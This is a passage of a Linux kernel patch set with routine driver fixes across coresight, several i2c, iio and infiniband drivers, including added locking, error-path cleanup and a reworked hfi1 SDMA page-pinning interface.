+index 43bbd5dc3d3b1..f9a0ee49d8e80 100644
+--- a/drivers/hwtracing/coresight/coresight-etm-perf.c
++++ b/drivers/hwtracing/coresight/coresight-etm-perf.c
+@@ -870,6 +870,7 @@ int __init etm_perf_init(void)
+ 	etm_pmu.addr_filters_sync	= etm_addr_filters_sync;
+ 	etm_pmu.addr_filters_validate	= etm_addr_filters_validate;
+ 	etm_pmu.nr_addr_filters		= ETM_ADDR_CMP_MAX;
++	etm_pmu.module			= THIS_MODULE;
+ 
+ 	ret = perf_pmu_register(&etm_pmu, CORESIGHT_ETM_PMU_NAME, -1);
+ 	if (ret == 0)
+diff --git a/drivers/i2c/busses/i2c-cadence.c b/drivers/i2c/busses/i2c-cadence.c
+index f58943cb13414..8a5fdb150c446 100644
+--- a/drivers/i2c/busses/i2c-cadence.c
++++ b/drivers/i2c/busses/i2c-cadence.c
+@@ -833,8 +833,10 @@ static int cdns_i2c_master_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs,
+ #if IS_ENABLED(CONFIG_I2C_SLAVE)
+ 	/* Check i2c operating mode and switch if possible */
+ 	if (id->dev_mode == CDNS_I2C_MODE_SLAVE) {
+-		if (id->slave_state != CDNS_I2C_SLAVE_STATE_IDLE)
+-			return -EAGAIN;
++		if (id->slave_state != CDNS_I2C_SLAVE_STATE_IDLE) {
++			ret = -EAGAIN;
++			goto out;
++		}
+ 
+ 		/* Set mode to master */
+ 		cdns_i2c_set_mode(CDNS_I2C_MODE_MASTER, id);
+diff --git a/drivers/i2c/busses/i2c-omap.c b/drivers/i2c/busses/i2c-omap.c
+index f9ae520aed228..7ec2521997061 100644
+--- a/drivers/i2c/busses/i2c-omap.c
++++ b/drivers/i2c/busses/i2c-omap.c
+@@ -1058,7 +1058,7 @@ omap_i2c_isr(int irq, void *dev_id)
+ 	u16 stat;
+ 
+ 	stat = omap_i2c_read_reg(omap, OMAP_I2C_STAT_REG);
+-	mask = omap_i2c_read_reg(omap, OMAP_I2C_IE_REG);
++	mask = omap_i2c_read_reg(omap, OMAP_I2C_IE_REG) & ~OMAP_I2C_STAT_NACK;
+ 
+ 	if (stat & mask)
+ 		ret = IRQ_WAKE_THREAD;
+diff --git a/drivers/i2c/busses/i2c-xiic.c b/drivers/i2c/busses/i2c-xiic.c
+index 277a02455cddd..effae4d467291 100644
+--- a/drivers/i2c/busses/i2c-xiic.c
++++ b/drivers/i2c/busses/i2c-xiic.c
+@@ -704,7 +704,7 @@ static int xiic_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 	err = xiic_start_xfer(i2c, msgs, num);
+ 	if (err < 0) {
+ 		dev_err(adap->dev.parent, "Error xiic_start_xfer\n");
+-		return err;
++		goto out;
+ 	}
+ 
+ 	err = wait_for_completion_timeout(&i2c->completion, XIIC_XFER_TIMEOUT);
+@@ -722,6 +722,8 @@ static int xiic_xfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ 		err = (i2c->state == STATE_DONE) ? num : -EIO;
+ 	}
+ 	mutex_unlock(&i2c->lock);
++
++out:
+ 	pm_runtime_mark_last_busy(i2c->dev);
+ 	pm_runtime_put_autosuspend(i2c->dev);
+ 	return err;
+diff --git a/drivers/iio/adc/palmas_gpadc.c b/drivers/iio/adc/palmas_gpadc.c
+index fd000345ec5cf..849a697a467e5 100644
+--- a/drivers/iio/adc/palmas_gpadc.c
++++ b/drivers/iio/adc/palmas_gpadc.c
+@@ -639,7 +639,7 @@ out:
+ 
+ static int palmas_gpadc_remove(struct platform_device *pdev)
+ {
+-	struct iio_dev *indio_dev = dev_to_iio_dev(&pdev->dev);
++	struct iio_dev *indio_dev = dev_get_drvdata(&pdev->dev);
+ 	struct palmas_gpadc *adc = iio_priv(indio_dev);
+ 
+ 	if (adc->wakeup1_enable || adc->wakeup2_enable)
+diff --git a/drivers/iio/addac/stx104.c b/drivers/iio/addac/stx104.c
+index 48a91a95e597b..b658a75d4e3a8 100644
+--- a/drivers/iio/addac/stx104.c
++++ b/drivers/iio/addac/stx104.c
+@@ -15,6 +15,7 @@
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/moduleparam.h>
++#include <linux/mutex.h>
+ #include <linux/spinlock.h>
+ #include <linux/types.h>
+ 
+@@ -69,10 +70,12 @@ struct stx104_reg {
+ 
+ /**
+  * struct stx104_iio - IIO device private data structure
++ * @lock: synchronization lock to prevent I/O race conditions
+  * @chan_out_states:	channels' output states
+  * @reg:		I/O address offset for the device registers
+  */
+ struct stx104_iio {
++	struct mutex lock;
+ 	unsigned int chan_out_states[STX104_NUM_OUT_CHAN];
+ 	struct stx104_reg __iomem *reg;
+ };
+@@ -114,6 +117,8 @@ static int stx104_read_raw(struct iio_dev *indio_dev,
+ 			return IIO_VAL_INT;
+ 		}
+ 
++		mutex_lock(&priv->lock);
++
+ 		/* select ADC channel */
+ 		iowrite8(chan->channel | (chan->channel << 4), &reg->achan);
+ 
+@@ -124,6 +129,8 @@ static int stx104_read_raw(struct iio_dev *indio_dev,
+ 		while (ioread8(&reg->cir_asr) & BIT(7));
+ 
+ 		*val = ioread16(&reg->ssr_ad);
++
++		mutex_unlock(&priv->lock);
+ 		return IIO_VAL_INT;
+ 	case IIO_CHAN_INFO_OFFSET:
+ 		/* get ADC bipolar/unipolar configuration */
+@@ -178,9 +185,12 @@ static int stx104_write_raw(struct iio_dev *indio_dev,
+ 			if ((unsigned int)val > 65535)
+ 				return -EINVAL;
+ 
++			mutex_lock(&priv->lock);
++
+ 			priv->chan_out_states[chan->channel] = val;
+ 			iowrite16(val, &priv->reg->dac[chan->channel]);
+ 
++			mutex_unlock(&priv->lock);
+ 			return 0;
+ 		}
+ 		return -EINVAL;
+@@ -351,6 +361,8 @@ static int stx104_probe(struct device *dev, unsigned int id)
+ 
+ 	indio_dev->name = dev_name(dev);
+ 
++	mutex_init(&priv->lock);
++
+ 	/* configure device for software trigger operation */
+ 	iowrite8(0, &priv->reg->acr);
+ 
+diff --git a/drivers/iio/light/max44009.c b/drivers/iio/light/max44009.c
+index 801e5a0ad496b..f3648f20ef2c0 100644
+--- a/drivers/iio/light/max44009.c
++++ b/drivers/iio/light/max44009.c
+@@ -528,6 +528,12 @@ static int max44009_probe(struct i2c_client *client,
+ 	return devm_iio_device_register(&client->dev, indio_dev);
+ }
+ 
++static const struct of_device_id max44009_of_match[] = {
++	{ .compatible = "maxim,max44009" },
++	{ }
++};
++MODULE_DEVICE_TABLE(of, max44009_of_match);
++
+ static const struct i2c_device_id max44009_id[] = {
+ 	{ "max44009", 0 },
+ 	{ }
+@@ -537,18 +543,13 @@ MODULE_DEVICE_TABLE(i2c, max44009_id);
+ static struct i2c_driver max44009_driver = {
+ 	.driver = {
+ 		.name = MAX44009_DRV_NAME,
++		.of_match_table = max44009_of_match,
+ 	},
+ 	.probe = max44009_probe,
+ 	.id_table = max44009_id,
+ };
+ module_i2c_driver(max44009_driver);
+ 
+-static const struct of_device_id max44009_of_match[] = {
+-	{ .compatible = "maxim,max44009" },
+-	{ }
+-};
+-MODULE_DEVICE_TABLE(of, max44009_of_match);
+-
+ MODULE_AUTHOR("Robert Eshleman <bobbyeshleman@gmail.com>");
+ MODULE_LICENSE("GPL v2");
+ MODULE_DESCRIPTION("MAX44009 ambient light sensor driver");
+diff --git a/drivers/infiniband/core/cm.c b/drivers/infiniband/core/cm.c
+index 1f9938a2c4752..b7f9023442890 100644
+--- a/drivers/infiniband/core/cm.c
++++ b/drivers/infiniband/core/cm.c
+@@ -2912,6 +2912,8 @@ static int cm_send_rej_locked(struct cm_id_private *cm_id_priv,
+ 	    (ari && ari_length > IB_CM_REJ_ARI_LENGTH))
+ 		return -EINVAL;
+ 
++	trace_icm_send_rej(&cm_id_priv->id, reason);
++
+ 	switch (state) {
+ 	case IB_CM_REQ_SENT:
+ 	case IB_CM_MRA_REQ_RCVD:
+@@ -2942,7 +2944,6 @@ static int cm_send_rej_locked(struct cm_id_private *cm_id_priv,
+ 		return -EINVAL;
+ 	}
+ 
+-	trace_icm_send_rej(&cm_id_priv->id, reason);
+ 	ret = ib_post_send_mad(msg, NULL);
+ 	if (ret) {
+ 		cm_free_msg(msg);
+diff --git a/drivers/infiniband/hw/erdma/erdma_hw.h b/drivers/infiniband/hw/erdma/erdma_hw.h
+index c533c693e5e38..2eb41e6d94c4f 100644
+--- a/drivers/infiniband/hw/erdma/erdma_hw.h
++++ b/drivers/infiniband/hw/erdma/erdma_hw.h
+@@ -112,6 +112,10 @@
+ 
+ #define ERDMA_PAGE_SIZE_SUPPORT 0x7FFFF000
+ 
++/* Hardware page size definition */
++#define ERDMA_HW_PAGE_SHIFT 12
++#define ERDMA_HW_PAGE_SIZE 4096
++
+ /* WQE related. */
+ #define EQE_SIZE 16
+ #define EQE_SHIFT 4
+diff --git a/drivers/infiniband/hw/erdma/erdma_verbs.c b/drivers/infiniband/hw/erdma/erdma_verbs.c
+index 19c69ea1b0c0f..654d8513873ec 100644
+--- a/drivers/infiniband/hw/erdma/erdma_verbs.c
++++ b/drivers/infiniband/hw/erdma/erdma_verbs.c
+@@ -38,7 +38,7 @@ static int create_qp_cmd(struct erdma_dev *dev, struct erdma_qp *qp)
+ 		   FIELD_PREP(ERDMA_CMD_CREATE_QP_PD_MASK, pd->pdn);
+ 
+ 	if (rdma_is_kernel_res(&qp->ibqp.res)) {
+-		u32 pgsz_range = ilog2(SZ_1M) - PAGE_SHIFT;
++		u32 pgsz_range = ilog2(SZ_1M) - ERDMA_HW_PAGE_SHIFT;
+ 
+ 		req.sq_cqn_mtt_cfg =
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+@@ -66,13 +66,13 @@ static int create_qp_cmd(struct erdma_dev *dev, struct erdma_qp *qp)
+ 		user_qp = &qp->user_qp;
+ 		req.sq_cqn_mtt_cfg = FIELD_PREP(
+ 			ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+-			ilog2(user_qp->sq_mtt.page_size) - PAGE_SHIFT);
++			ilog2(user_qp->sq_mtt.page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.sq_cqn_mtt_cfg |=
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_CQN_MASK, qp->scq->cqn);
+ 
+ 		req.rq_cqn_mtt_cfg = FIELD_PREP(
+ 			ERDMA_CMD_CREATE_QP_PAGE_SIZE_MASK,
+-			ilog2(user_qp->rq_mtt.page_size) - PAGE_SHIFT);
++			ilog2(user_qp->rq_mtt.page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.rq_cqn_mtt_cfg |=
+ 			FIELD_PREP(ERDMA_CMD_CREATE_QP_CQN_MASK, qp->rcq->cqn);
+ 
+@@ -163,7 +163,7 @@ static int create_cq_cmd(struct erdma_dev *dev, struct erdma_cq *cq)
+ 	if (rdma_is_kernel_res(&cq->ibcq.res)) {
+ 		page_size = SZ_32M;
+ 		req.cfg0 |= FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
+-				       ilog2(page_size) - PAGE_SHIFT);
++				       ilog2(page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		req.qbuf_addr_l = lower_32_bits(cq->kern_cq.qbuf_dma_addr);
+ 		req.qbuf_addr_h = upper_32_bits(cq->kern_cq.qbuf_dma_addr);
+ 
+@@ -176,8 +176,9 @@ static int create_cq_cmd(struct erdma_dev *dev, struct erdma_cq *cq)
+ 			cq->kern_cq.qbuf_dma_addr + (cq->depth << CQE_SHIFT);
+ 	} else {
+ 		mtt = &cq->user_cq.qbuf_mtt;
+-		req.cfg0 |= FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
+-				       ilog2(mtt->page_size) - PAGE_SHIFT);
++		req.cfg0 |=
++			FIELD_PREP(ERDMA_CMD_CREATE_CQ_PAGESIZE_MASK,
++				   ilog2(mtt->page_size) - ERDMA_HW_PAGE_SHIFT);
+ 		if (mtt->mtt_nents == 1) {
+ 			req.qbuf_addr_l = lower_32_bits(*(u64 *)mtt->mtt_buf);
+ 			req.qbuf_addr_h = upper_32_bits(*(u64 *)mtt->mtt_buf);
+@@ -618,7 +619,7 @@ static int init_user_qp(struct erdma_qp *qp, struct erdma_ucontext *uctx,
+ 	u32 rq_offset;
+ 	int ret;
+ 
+-	if (len < (PAGE_ALIGN(qp->attrs.sq_size * SQEBB_SIZE) +
++	if (len < (ALIGN(qp->attrs.sq_size * SQEBB_SIZE, ERDMA_HW_PAGE_SIZE) +
+ 		   qp->attrs.rq_size * RQE_SIZE))
+ 		return -EINVAL;
+ 
+@@ -628,7 +629,7 @@ static int init_user_qp(struct erdma_qp *qp, struct erdma_ucontext *uctx,
+ 	if (ret)
+ 		return ret;
+ 
+-	rq_offset = PAGE_ALIGN(qp->attrs.sq_size << SQEBB_SHIFT);
++	rq_offset = ALIGN(qp->attrs.sq_size << SQEBB_SHIFT, ERDMA_HW_PAGE_SIZE);
+ 	qp->user_qp.rq_offset = rq_offset;
+ 
+ 	ret = get_mtt_entries(qp->dev, &qp->user_qp.rq_mtt, va + rq_offset,
+diff --git a/drivers/infiniband/hw/hfi1/ipoib_tx.c b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+index 5d9a7b09ca37e..8973a081d641e 100644
+--- a/drivers/infiniband/hw/hfi1/ipoib_tx.c
++++ b/drivers/infiniband/hw/hfi1/ipoib_tx.c
+@@ -215,6 +215,7 @@ static int hfi1_ipoib_build_ulp_payload(struct ipoib_txreq *tx,
+ 		const skb_frag_t *frag = &skb_shinfo(skb)->frags[i];
+ 
+ 		ret = sdma_txadd_page(dd,
++				      NULL,
+ 				      txreq,
+ 				      skb_frag_page(frag),
+ 				      frag->bv_offset,
+@@ -737,10 +738,13 @@ int hfi1_ipoib_txreq_init(struct hfi1_ipoib_dev_priv *priv)
+ 		txq->tx_ring.shift = ilog2(tx_item_size);
+ 		txq->tx_ring.avail = hfi1_ipoib_ring_hwat(txq);
+ 		tx_ring = &txq->tx_ring;
+-		for (j = 0; j < tx_ring_size; j++)
++		for (j = 0; j < tx_ring_size; j++) {
+ 			hfi1_txreq_from_idx(tx_ring, j)->sdma_hdr =
+ 				kzalloc_node(sizeof(*tx->sdma_hdr),
+ 					     GFP_KERNEL, priv->dd->node);
++			if (!hfi1_txreq_from_idx(tx_ring, j)->sdma_hdr)
++				goto free_txqs;
++		}
+ 
+ 		netif_napi_add_tx(dev, &txq->napi, hfi1_ipoib_poll_tx_ring);
+ 	}
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.c b/drivers/infiniband/hw/hfi1/mmu_rb.c
+index 7333646021bb8..71b9ac0188875 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.c
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.c
+@@ -126,11 +126,11 @@ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 	spin_lock_irqsave(&handler->lock, flags);
+ 	node = __mmu_rb_search(handler, mnode->addr, mnode->len);
+ 	if (node) {
+-		ret = -EINVAL;
++		ret = -EEXIST;
+ 		goto unlock;
+ 	}
+ 	__mmu_int_rb_insert(mnode, &handler->root);
+-	list_add(&mnode->list, &handler->lru_list);
++	list_add_tail(&mnode->list, &handler->lru_list);
+ 
+ 	ret = handler->ops->insert(handler->ops_arg, mnode);
+ 	if (ret) {
+@@ -143,6 +143,19 @@ unlock:
+ 	return ret;
+ }
+ 
++/* Caller must hold handler lock */
++struct mmu_rb_node *hfi1_mmu_rb_get_first(struct mmu_rb_handler *handler,
++					  unsigned long addr, unsigned long len)
++{
++	struct mmu_rb_node *node;
++
++	trace_hfi1_mmu_rb_search(addr, len);
++	node = __mmu_int_rb_iter_first(&handler->root, addr, (addr + len) - 1);
++	if (node)
++		list_move_tail(&node->list, &handler->lru_list);
++	return node;
++}
++
+ /* Caller must hold handler lock */
+ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *handler,
+ 					   unsigned long addr,
+@@ -167,32 +180,6 @@ static struct mmu_rb_node *__mmu_rb_search(struct mmu_rb_handler *handler,
+ 	return node;
+ }
+ 
+-bool hfi1_mmu_rb_remove_unless_exact(struct mmu_rb_handler *handler,
+-				     unsigned long addr, unsigned long len,
+-				     struct mmu_rb_node **rb_node)
+-{
+-	struct mmu_rb_node *node;
+-	unsigned long flags;
+-	bool ret = false;
+-
+-	if (current->mm != handler->mn.mm)
+-		return ret;
+-
+-	spin_lock_irqsave(&handler->lock, flags);
+-	node = __mmu_rb_search(handler, addr, len);
+-	if (node) {
+-		if (node->addr == addr && node->len == len)
+-			goto unlock;
+-		__mmu_int_rb_remove(node, &handler->root);
+-		list_del(&node->list); /* remove from LRU list */
+-		ret = true;
+-	}
+-unlock:
+-	spin_unlock_irqrestore(&handler->lock, flags);
+-	*rb_node = node;
+-	return ret;
+-}
+-
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ {
+ 	struct mmu_rb_node *rbnode, *ptr;
+@@ -206,8 +193,7 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 	INIT_LIST_HEAD(&del_list);
+ 
+ 	spin_lock_irqsave(&handler->lock, flags);
+-	list_for_each_entry_safe_reverse(rbnode, ptr, &handler->lru_list,
+-					 list) {
++	list_for_each_entry_safe(rbnode, ptr, &handler->lru_list, list) {
+ 		if (handler->ops->evict(handler->ops_arg, rbnode, evict_arg,
+ 					&stop)) {
+ 			__mmu_int_rb_remove(rbnode, &handler->root);
+@@ -219,36 +205,11 @@ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg)
+ 	}
+ 	spin_unlock_irqrestore(&handler->lock, flags);
+ 
+-	while (!list_empty(&del_list)) {
+-		rbnode = list_first_entry(&del_list, struct mmu_rb_node, list);
+-		list_del(&rbnode->list);
++	list_for_each_entry_safe(rbnode, ptr, &del_list, list) {
+ 		handler->ops->remove(handler->ops_arg, rbnode);
+ 	}
+ }
+ 
+-/*
+- * It is up to the caller to ensure that this function does not race with the
+- * mmu invalidate notifier which may be calling the users remove callback on
+- * 'node'.
+- */
+-void hfi1_mmu_rb_remove(struct mmu_rb_handler *handler,
+-			struct mmu_rb_node *node)
+-{
+-	unsigned long flags;
+-
+-	if (current->mm != handler->mn.mm)
+-		return;
+-
+-	/* Validity of handler and node pointers has been checked by caller. */
+-	trace_hfi1_mmu_rb_remove(node->addr, node->len);
+-	spin_lock_irqsave(&handler->lock, flags);
+-	__mmu_int_rb_remove(node, &handler->root);
+-	list_del(&node->list); /* remove from LRU list */
+-	spin_unlock_irqrestore(&handler->lock, flags);
+-
+-	handler->ops->remove(handler->ops_arg, node);
+-}
+-
+ static int mmu_notifier_range_start(struct mmu_notifier *mn,
+ 		const struct mmu_notifier_range *range)
+ {
+diff --git a/drivers/infiniband/hw/hfi1/mmu_rb.h b/drivers/infiniband/hw/hfi1/mmu_rb.h
+index 7417be2b9dc8a..ed75acdb7b839 100644
+--- a/drivers/infiniband/hw/hfi1/mmu_rb.h
++++ b/drivers/infiniband/hw/hfi1/mmu_rb.h
+@@ -52,10 +52,8 @@ void hfi1_mmu_rb_unregister(struct mmu_rb_handler *handler);
+ int hfi1_mmu_rb_insert(struct mmu_rb_handler *handler,
+ 		       struct mmu_rb_node *mnode);
+ void hfi1_mmu_rb_evict(struct mmu_rb_handler *handler, void *evict_arg);
+-void hfi1_mmu_rb_remove(struct mmu_rb_handler *handler,
+-			struct mmu_rb_node *mnode);
+-bool hfi1_mmu_rb_remove_unless_exact(struct mmu_rb_handler *handler,
+-				     unsigned long addr, unsigned long len,
+-				     struct mmu_rb_node **rb_node);
++struct mmu_rb_node *hfi1_mmu_rb_get_first(struct mmu_rb_handler *handler,
++					  unsigned long addr,
++					  unsigned long len);
+ 
+ #endif /* _HFI1_MMU_RB_H */
+diff --git a/drivers/infiniband/hw/hfi1/sdma.c b/drivers/infiniband/hw/hfi1/sdma.c
+index 8ed20392e9f0d..bb2552dd29c1e 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.c
++++ b/drivers/infiniband/hw/hfi1/sdma.c
+@@ -1593,22 +1593,7 @@ static inline void sdma_unmap_desc(
+ 	struct hfi1_devdata *dd,
+ 	struct sdma_desc *descp)
+ {
+-	switch (sdma_mapping_type(descp)) {
+-	case SDMA_MAP_SINGLE:
+-		dma_unmap_single(
+-			&dd->pcidev->dev,
+-			sdma_mapping_addr(descp),
+-			sdma_mapping_len(descp),
+-			DMA_TO_DEVICE);
+-		break;
+-	case SDMA_MAP_PAGE:
+-		dma_unmap_page(
+-			&dd->pcidev->dev,
+-			sdma_mapping_addr(descp),
+-			sdma_mapping_len(descp),
+-			DMA_TO_DEVICE);
+-		break;
+-	}
++	system_descriptor_complete(dd, descp);
+ }
+ 
+ /*
+@@ -3128,7 +3113,7 @@ int ext_coal_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx,
+ 
+ 		/* Add descriptor for coalesce buffer */
+ 		tx->desc_limit = MAX_DESC;
+-		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, tx,
++		return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx,
+ 					 addr, tx->tlen);
+ 	}
+ 
+@@ -3167,10 +3152,12 @@ int _pad_sdma_tx_descs(struct hfi1_devdata *dd, struct sdma_txreq *tx)
+ 			return rval;
+ 		}
+ 	}
++
+ 	/* finish the one just added */
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		SDMA_MAP_NONE,
++		NULL,
+ 		dd->sdma_pad_phys,
+ 		sizeof(u32) - (tx->packet_len & (sizeof(u32) - 1)));
+ 	tx->num_desc++;
+diff --git a/drivers/infiniband/hw/hfi1/sdma.h b/drivers/infiniband/hw/hfi1/sdma.h
+index b023fc461bd51..95aaec14c6c28 100644
+--- a/drivers/infiniband/hw/hfi1/sdma.h
++++ b/drivers/infiniband/hw/hfi1/sdma.h
+@@ -594,6 +594,7 @@ static inline dma_addr_t sdma_mapping_addr(struct sdma_desc *d)
+ static inline void make_tx_sdma_desc(
+ 	struct sdma_txreq *tx,
+ 	int type,
++	void *pinning_ctx,
+ 	dma_addr_t addr,
+ 	size_t len)
+ {
+@@ -612,6 +613,7 @@ static inline void make_tx_sdma_desc(
+ 				<< SDMA_DESC0_PHY_ADDR_SHIFT) |
+ 			(((u64)len & SDMA_DESC0_BYTE_COUNT_MASK)
+ 				<< SDMA_DESC0_BYTE_COUNT_SHIFT);
++	desc->pinning_ctx = pinning_ctx;
+ }
+ 
+ /* helper to extend txreq */
+@@ -643,6 +645,7 @@ static inline void _sdma_close_tx(struct hfi1_devdata *dd,
+ static inline int _sdma_txadd_daddr(
+ 	struct hfi1_devdata *dd,
+ 	int type,
++	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	dma_addr_t addr,
+ 	u16 len)
+@@ -652,6 +655,7 @@ static inline int _sdma_txadd_daddr(
+ 	make_tx_sdma_desc(
+ 		tx,
+ 		type,
++		pinning_ctx,
+ 		addr, len);
+ 	WARN_ON(len > tx->tlen);
+ 	tx->num_desc++;
+@@ -672,6 +676,7 @@ static inline int _sdma_txadd_daddr(
+ /**
+  * sdma_txadd_page() - add a page to the sdma_txreq
+  * @dd: the device to use for mapping
++ * @pinning_ctx: context to be released at descriptor retirement
+  * @tx: tx request to which the page is added
+  * @page: page to map
+  * @offset: offset within the page
+@@ -687,6 +692,7 @@ static inline int _sdma_txadd_daddr(
+  */
+ static inline int sdma_txadd_page(
+ 	struct hfi1_devdata *dd,
++	void *pinning_ctx,
+ 	struct sdma_txreq *tx,
+ 	struct page *page,
+ 	unsigned long offset,
+@@ -714,8 +720,7 @@ static inline int sdma_txadd_page(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(
+-			dd, SDMA_MAP_PAGE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_PAGE, pinning_ctx, tx, addr, len);
+ }
+ 
+ /**
+@@ -749,7 +754,8 @@ static inline int sdma_txadd_daddr(
+ 			return rval;
+ 	}
+ 
+-	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_NONE, NULL, tx,
++				 addr, len);
+ }
+ 
+ /**
+@@ -795,8 +801,7 @@ static inline int sdma_txadd_kvaddr(
+ 		return -ENOSPC;
+ 	}
+ 
+-	return _sdma_txadd_daddr(
+-			dd, SDMA_MAP_SINGLE, tx, addr, len);
++	return _sdma_txadd_daddr(dd, SDMA_MAP_SINGLE, NULL, tx, addr, len);
+ }
+ 
+ struct iowait_work;
+@@ -1030,4 +1035,5 @@ extern uint mod_num_sdma;
+ 
+ void sdma_update_lmc(struct hfi1_devdata *dd, u64 mask, u32 lid);
+ 
++void system_descriptor_complete(struct hfi1_devdata *dd, struct sdma_desc *descp);
+ #endif
+diff --git a/drivers/infiniband/hw/hfi1/sdma_txreq.h b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+index e262fb5c5ec61..fad946cb5e0d8 100644
+--- a/drivers/infiniband/hw/hfi1/sdma_txreq.h
++++ b/drivers/infiniband/hw/hfi1/sdma_txreq.h
+@@ -19,6 +19,7 @@
+ struct sdma_desc {
+ 	/* private:  don't use directly */
+ 	u64 qw[2];
++	void *pinning_ctx;
+ };
+ 
+ /**
+diff --git a/drivers/infiniband/hw/hfi1/trace_mmu.h b/drivers/infiniband/hw/hfi1/trace_mmu.h
+index 187e9244fe5ed..57900ebb7702e 100644
+--- a/drivers/infiniband/hw/hfi1/trace_mmu.h
++++ b/drivers/infiniband/hw/hfi1/trace_mmu.h
+@@ -37,10 +37,6 @@ DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_rb_search,
+ 	     TP_PROTO(unsigned long addr, unsigned long len),
+ 	     TP_ARGS(addr, len));
+ 
+-DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_rb_remove,
+-	     TP_PROTO(unsigned long addr, unsigned long len),
+-	     TP_ARGS(addr, len));
+-
+ DEFINE_EVENT(hfi1_mmu_rb_template, hfi1_mmu_mem_invalidate,
+ 	     TP_PROTO(unsigned long addr, unsigned long len),
+ 	     TP_ARGS(addr, len));
+diff --git a/drivers/infiniband/hw/hfi1/user_sdma.c b/drivers/infiniband/hw/hfi1/user_sdma.c
+index a71c5a36cebab..ae58b48afe074 100644
+--- a/drivers/infiniband/hw/hfi1/user_sdma.c
++++ b/drivers/infiniband/hw/hfi1/user_sdma.c
+@@ -24,7 +24,6 @@
+ 
+ #include "hfi.h"
+ #include "sdma.h"
+-#include "mmu_rb.h"
+ #include "user_sdma.h"
+ #include "verbs.h"  /* for the headers */
+ #include "common.h" /* for struct hfi1_tid_info */
+@@ -39,11 +38,7 @@ static unsigned initial_pkt_count = 8;
+ static int user_sdma_send_pkts(struct user_sdma_request *req, u16 maxpkts);
+ static void user_sdma_txreq_cb(struct sdma_txreq *txreq, int status);
+ static inline void pq_update(struct hfi1_user_sdma_pkt_q *pq);
+-static void user_sdma_free_request(struct user_sdma_request *req, bool unpin);
+-static int pin_vector_pages(struct user_sdma_request *req,
+-			    struct user_sdma_iovec *iovec);
+-static void unpin_vector_pages(struct mm_struct *mm, struct page **pages,
+-			       unsigned start, unsigned npages);
++static void user_sdma_free_request(struct user_sdma_request *req);
+ static int check_header_template(struct user_sdma_request *req,
+ 				 struct hfi1_pkt_header *hdr, u32 lrhlen,
+ 				 u32 datalen);
+@@ -81,6 +76,11 @@ static struct mmu_rb_ops sdma_rb_ops = {
+ 	.invalidate = sdma_rb_invalidate
+ };
+ 
++static int add_system_pages_to_sdma_packet(struct user_sdma_request *req,
++					   struct user_sdma_txreq *tx,
++					   struct user_sdma_iovec *iovec,
++					   u32 *pkt_remaining);
++
+ static int defer_packet_queue(
+ 	struct sdma_engine *sde,
+ 	struct iowait_work *wait,
+@@ -410,6 +410,7 @@ int hfi1_user_sdma_process_request(struct hfi1_filedata *fd,
+ 		ret = -EINVAL;
+ 		goto free_req;
+ 	}
++
+ 	/* Copy the header from the user buffer */
+ 	ret = copy_from_user(&req->hdr, iovec[idx].iov_base + sizeof(info),
+ 			     sizeof(req->hdr));
+@@ -484,9 +485,8 @@ int hfi1_user_sdma_process_request(struct hfi1_filedata *fd,
+ 		memcpy(&req->iovs[i].iov,
+ 		       iovec + idx++,
+ 		       sizeof(req->iovs[i].iov));
+-		ret = pin_vector_pages(req, &req->iovs[i]);
+-		if (ret) {
+-			req->data_iovs = i;
++		if (req->iovs[i].iov.iov_len == 0) {
++			ret = -EINVAL;
+ 			goto free_req;
+ 		}
+ 		req->data_len += req->iovs[i].iov.iov_len;
+@@ -584,7 +584,7 @@ free_req:
+ 		if (req->seqsubmitted)
+ 			wait_event(pq->busy.wait_dma,
+ 				   (req->seqcomp == req->seqsubmitted - 1));
+-		user_sdma_free_request(req, true);
++		user_sdma_free_request(req);
+ 		pq_update(pq);
+ 		set_comp_state(pq, cq, info.comp_idx, ERROR, ret);
+ 	}
+@@ -696,48 +696,6 @@ static int user_sdma_txadd_ahg(struct user_sdma_request *req,
+ 	return ret;
+ }
+ 
+-static int user_sdma_txadd(struct user_sdma_request *req,
+-			   struct user_sdma_txreq *tx,
+-			   struct user_sdma_iovec *iovec, u32 datalen,
+-			   u32 *queued_ptr, u32 *data_sent_ptr,
+-			   u64 *iov_offset_ptr)
+-{
+-	int ret;
+-	unsigned int pageidx, len;
+-	unsigned long base, offset;
+-	u64 iov_offset = *iov_offset_ptr;
+-	u32 queued = *queued_ptr, data_sent = *data_sent_ptr;
+-	struct hfi1_user_sdma_pkt_q *pq = req->pq;
+-
+-	base = (unsigned long)iovec->iov.iov_base;
